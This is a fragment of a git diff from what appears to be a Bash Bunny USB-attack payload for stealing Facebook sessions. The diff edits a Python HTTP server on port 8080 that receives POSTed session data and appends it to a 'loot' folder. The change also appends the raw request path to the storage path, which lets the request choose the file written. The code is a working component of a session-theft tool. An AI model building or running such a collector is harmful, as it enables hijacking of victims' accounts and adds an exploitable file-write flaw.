||||
ATTACKMODE RNDIS_ETHERNET
|
||||
|
|
|
|||
|
|
@ -3,10 +3,9 @@ from os import curdir
|
|||
from os.path import join as pjoin
|
||||
|
||||
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
|
||||
# from http.server import BaseHTTPRequestHandler, HTTPServer
|
||||
|
||||
class StoreHandler(BaseHTTPRequestHandler):
|
||||
store_path = pjoin("/root/udisk/loot/FacebookSession/", 'l')
|
||||
store_path = "/root/udisk/loot/FacebookSession"
|
||||
get_path = pjoin(curdir, 'p')
|
||||
|
||||
def do_GET(self):
|
||||
|
|
@ -18,16 +17,14 @@ class StoreHandler(BaseHTTPRequestHandler):
|
|||
self.wfile.write(fh.read().encode())
|
||||
|
||||
def do_POST(self):
|
||||
if self.path == '/l':
|
||||
length = self.headers['content-length']
|
||||
data = self.rfile.read(int(length))
|
||||
length = self.headers['content-length']
|
||||
data = self.rfile.read(int(length))
|
||||
|
||||
with open(self.store_path, 'a') as fh:
|
||||
fh.write(data.decode() + "\n")
|
||||
with open(self.store_path + self.path, 'a') as fh:
|
||||
fh.write(data.decode() + "\n")
|
||||
|
||||
self.send_response(200)
|
||||
self.send_response(200)
|
||||
|
||||
|
||||
server = HTTPServer(('', 8080), StoreHandler)
|
||||
server.serve_forever()
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue